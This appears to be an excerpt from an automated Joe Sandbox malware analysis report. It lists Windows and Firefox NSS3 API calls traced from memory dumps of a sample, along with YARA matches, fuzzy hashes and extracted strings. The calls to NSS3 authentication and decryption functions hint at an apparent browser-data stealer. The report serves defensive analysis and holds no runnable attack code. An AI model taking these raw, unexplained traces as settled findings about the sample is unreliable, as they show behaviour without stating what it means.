                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Error$memcpy$K11_Value
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2334702667-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C59ED6B
                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000000), ref: 6C59EDCE
                                                                                                                                                                                            • Part of subcall function 6C590BE0: malloc.MOZGLUE(6C588D2D,?,00000000,?), ref: 6C590BF8
                                                                                                                                                                                            • Part of subcall function 6C590BE0: TlsGetValue.KERNEL32(6C588D2D,?,00000000,?), ref: 6C590C15
                                                                                                                                                                                          • free.MOZGLUE(00000000,?,?,?,?,6C59B04F), ref: 6C59EE46
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C59EECA
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C59EEEA
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C59EEFB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Alloc_Util$Arena$Valuefreemalloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3768380896-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6C4714C5
                                                                                                                                                                                          • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C4714E2
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6C471546
                                                                                                                                                                                          • InitializeConditionVariable.KERNEL32(?), ref: 6C4715BA
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C4716B4
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1909280232-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 6C59C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C59DAE2,?), ref: 6C59C6C2
                                                                                                                                                                                          • PR_Now.NSS3 ref: 6C59CD35
                                                                                                                                                                                            • Part of subcall function 6C5F9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C640A27), ref: 6C5F9DC6
                                                                                                                                                                                            • Part of subcall function 6C5F9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C640A27), ref: 6C5F9DD1
                                                                                                                                                                                            • Part of subcall function 6C5F9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C5F9DED
                                                                                                                                                                                            • Part of subcall function 6C586C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C531C6F,00000000,00000004,?,?), ref: 6C586C3F
                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C59CD54
                                                                                                                                                                                            • Part of subcall function 6C5F9BF0: TlsGetValue.KERNEL32(?,?,?,6C640A75), ref: 6C5F9C07
                                                                                                                                                                                            • Part of subcall function 6C587260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C531CCC,00000000,00000000,?,?), ref: 6C58729F
                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C59CD9B
                                                                                                                                                                                          • PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C59CE0B
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C59CE2C
                                                                                                                                                                                            • Part of subcall function 6C5910C0: TlsGetValue.KERNEL32(?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C5910F3
                                                                                                                                                                                            • Part of subcall function 6C5910C0: EnterCriticalSection.KERNEL32(?,?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C59110C
                                                                                                                                                                                            • Part of subcall function 6C5910C0: PL_ArenaAllocate.NSS3(?,?,?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C591141
                                                                                                                                                                                            • Part of subcall function 6C5910C0: PR_Unlock.NSS3(?,?,?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C591182
                                                                                                                                                                                            • Part of subcall function 6C5910C0: TlsGetValue.KERNEL32(?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C59119C
                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(00000000), ref: 6C59CE40
                                                                                                                                                                                            • Part of subcall function 6C5914C0: TlsGetValue.KERNEL32 ref: 6C5914E0
                                                                                                                                                                                            • Part of subcall function 6C5914C0: EnterCriticalSection.KERNEL32 ref: 6C5914F5
                                                                                                                                                                                            • Part of subcall function 6C5914C0: PR_Unlock.NSS3 ref: 6C59150D
                                                                                                                                                                                            • Part of subcall function 6C59CEE0: PORT_ArenaMark_Util.NSS3(?,6C59CD93,?), ref: 6C59CEEE
                                                                                                                                                                                            • Part of subcall function 6C59CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C59CD93,?), ref: 6C59CEFC
                                                                                                                                                                                            • Part of subcall function 6C59CEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C59CD93,?), ref: 6C59CF0B
                                                                                                                                                                                            • Part of subcall function 6C59CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C59CD93,?), ref: 6C59CF1D
                                                                                                                                                                                            • Part of subcall function 6C59CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C59CD93,?), ref: 6C59CF47
                                                                                                                                                                                            • Part of subcall function 6C59CEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C59CD93,?), ref: 6C59CF67
                                                                                                                                                                                            • Part of subcall function 6C59CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C59CD93,?,?,?,?,?,?,?,?,?,?,?,6C59CD93,?), ref: 6C59CF78
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3748922049-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6C56EF38
                                                                                                                                                                                            • Part of subcall function 6C559520: PK11_IsLoggedIn.NSS3(00000000,?,6C58379E,?,00000001,?), ref: 6C559542
                                                                                                                                                                                          • PK11_Authenticate.NSS3(?,00000001,?), ref: 6C56EF53
                                                                                                                                                                                            • Part of subcall function 6C574C20: TlsGetValue.KERNEL32 ref: 6C574C4C
                                                                                                                                                                                            • Part of subcall function 6C574C20: EnterCriticalSection.KERNEL32(?), ref: 6C574C60
                                                                                                                                                                                            • Part of subcall function 6C574C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C574CA1
                                                                                                                                                                                            • Part of subcall function 6C574C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C574CBE
                                                                                                                                                                                            • Part of subcall function 6C574C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C574CD2
                                                                                                                                                                                            • Part of subcall function 6C574C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C574D3A
                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C56EF9E
                                                                                                                                                                                            • Part of subcall function 6C5F9BF0: TlsGetValue.KERNEL32(?,?,?,6C640A75), ref: 6C5F9C07
                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C56EFC3
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C56F016
                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C56F022
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2459274275-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: strtok_s
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3330995566-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6C532D1A), ref: 6C542E7E
                                                                                                                                                                                            • Part of subcall function 6C5907B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C538298,?,?,?,6C52FCE5,?), ref: 6C5907BF
                                                                                                                                                                                            • Part of subcall function 6C5907B0: PL_HashTableLookup.NSS3(?,?), ref: 6C5907E6
                                                                                                                                                                                            • Part of subcall function 6C5907B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C59081B
                                                                                                                                                                                            • Part of subcall function 6C5907B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C590825
                                                                                                                                                                                          • PR_Now.NSS3 ref: 6C542EDF
                                                                                                                                                                                          • CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6C542EE9
                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6C532D1A), ref: 6C542F01
                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6C532D1A), ref: 6C542F50
                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C542F81
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 287051776-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6C46DC60
                                                                                                                                                                                          • AcquireSRWLockExclusive.KERNEL32(?,?,?,6C46D38A,?), ref: 6C46DC6F
                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,6C46D38A,?), ref: 6C46DCC1
                                                                                                                                                                                          • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C46D38A,?), ref: 6C46DCE9
                                                                                                                                                                                          • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C46D38A,?), ref: 6C46DD05
                                                                                                                                                                                          • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C46D38A,?), ref: 6C46DD4A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1842996449-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CERT_DecodeAVAValue.NSS3(?,?,6C530A2C), ref: 6C530E0F
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6C530A2C), ref: 6C530E73
                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6C530A2C), ref: 6C530E85
                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(00000001,?,?,6C530A2C), ref: 6C530E90
                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C530EC4
                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6C530A2C), ref: 6C530ED9
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3618544408-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C53AEB3
                                                                                                                                                                                          • SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6C53AECA
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C53AEDD
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE022,00000000), ref: 6C53AF02
                                                                                                                                                                                          • SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6C659500), ref: 6C53AF23
                                                                                                                                                                                            • Part of subcall function 6C58F080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C58F0C8
                                                                                                                                                                                            • Part of subcall function 6C58F080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C58F122
                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C53AF37
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3714604333-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5BEE85
                                                                                                                                                                                          • realloc.MOZGLUE(13326EFB,?), ref: 6C5BEEAE
                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?), ref: 6C5BEEC5
                                                                                                                                                                                            • Part of subcall function 6C590BE0: malloc.MOZGLUE(6C588D2D,?,00000000,?), ref: 6C590BF8
                                                                                                                                                                                            • Part of subcall function 6C590BE0: TlsGetValue.KERNEL32(6C588D2D,?,00000000,?), ref: 6C590C15
                                                                                                                                                                                          • htonl.WSOCK32(?), ref: 6C5BEEE3
                                                                                                                                                                                          • htonl.WSOCK32(00000000,?), ref: 6C5BEEED
                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C5BEF01
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1351805024-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C56EE49
                                                                                                                                                                                            • Part of subcall function 6C58FAB0: free.MOZGLUE(?,-00000001,?,?,6C52F673,00000000,00000000), ref: 6C58FAC7
                                                                                                                                                                                          • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C56EE5C
                                                                                                                                                                                          • PK11_CreateContextBySymKey.NSS3(?,00000104,?,?), ref: 6C56EE77
                                                                                                                                                                                          • PK11_CipherOp.NSS3(00000000,?,00000008,?,?,?), ref: 6C56EE9D
                                                                                                                                                                                          • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C56EEB3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: K11_$ContextItem_Util$AllocCipherCreateDestroyZfreefree
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 886189093-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C45DA31,m" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunity,?,?,00000000,?), ref: 6C46CDA4
                                                                                                                                                                                            • Part of subcall function 6C42CA10: malloc.MOZGLUE(?), ref: 6C42CA26
                                                                                                                                                                                            • Part of subcall function 6C46D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,m" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunity,?,6C46CDBA,m" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunity,?,00000000,?,6C45DA31,m" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunity,?,?,00000000,?), ref: 6C46D158
                                                                                                                                                                                            • Part of subcall function 6C46D130: InitializeConditionVariable.KERNEL32(00000098,?,6C46CDBA,m" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunity,?,00000000,?,6C45DA31,m" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunity,?,?,00000000,?), ref: 6C46D177
                                                                                                                                                                                          • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C45DA31,m" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunity,?,?,00000000,?), ref: 6C46CDC4
                                                                                                                                                                                            • Part of subcall function 6C467480: ReleaseSRWLockExclusive.KERNEL32(?,6C4715FC,?,?,?,?,6C4715FC,?), ref: 6C4674EB
                                                                                                                                                                                          • moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C45DA31,m" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunity,?,?,00000000,?), ref: 6C46CECC
                                                                                                                                                                                            • Part of subcall function 6C42CA10: mozalloc_abort.MOZGLUE(?), ref: 6C42CAA2
                                                                                                                                                                                            • Part of subcall function 6C45CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C46CEEA,?,?,?,?,00000000,?,6C45DA31,m" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunity,?,?,00000000), ref: 6C45CB57
                                                                                                                                                                                            • Part of subcall function 6C45CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C45CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C46CEEA,?,?), ref: 6C45CBAF
                                                                                                                                                                                          • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C45DA31,m" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunity,?,?,00000000,?), ref: 6C46D058
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • m" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunity, xrefs: 6C46CCF4, 6C46CD6C, 6C46CDB4
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
                                                                                                                                                                                          • String ID: m" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunity
                                                                                                                                                                                          • API String ID: 861561044-1856350843
                                                                                                                                                                                          • Opcode ID: bdf2b4cf721bf3a0fcd47efaa21cc45cbe896e4c17265868847a8d4b0a53c2a4
                                                                                                                                                                                          • Instruction ID: 345eaf93b45b6de837c618210fc03283383e946df14e88126b541655bb4815df
                                                                                                                                                                                          • Opcode Fuzzy Hash: bdf2b4cf721bf3a0fcd47efaa21cc45cbe896e4c17265868847a8d4b0a53c2a4
                                                                                                                                                                                          • Instruction Fuzzy Hash: D8D17D71A04B069FD708CF29C480F99B7F1BF99308F11862DE85987B56EB31A965CBC1
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • StrStrA.SHLWAPI(?,00000000,?,?,?,00033794,00000000,00000010), ref: 00032119
                                                                                                                                                                                          • lstrcpynA.KERNEL32(C:\Users\user\Desktop\,?,00000000,?), ref: 00032132
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00032144
                                                                                                                                                                                          • wsprintfA.USER32 ref: 00032156
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpynlstrlenwsprintf
                                                                                                                                                                                          • String ID: %s%s$C:\Users\user\Desktop\
                                                                                                                                                                                          • API String ID: 1206339513-438050915
                                                                                                                                                                                          • Opcode ID: f6a4dbba339eb86ecf99d12b48804dde3d9876007bc83bf254d9bf6d9b1ba314
                                                                                                                                                                                          • Instruction ID: 0e1ef2b1eebb3e0affb26d3006ea7387d5271336b2656e0cddee3977c79e8e63
                                                                                                                                                                                          • Opcode Fuzzy Hash: f6a4dbba339eb86ecf99d12b48804dde3d9876007bc83bf254d9bf6d9b1ba314
                                                                                                                                                                                          • Instruction Fuzzy Hash: 84F0E932200119BFDF111F59EC4CD6BBFACEF59665B0600A0FA0C97211C7715D5586F1
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C51AFDA
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C51AFC4
                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C51AFD3
                                                                                                                                                                                          • unable to delete/modify collation sequence due to active statements, xrefs: 6C51AF5C
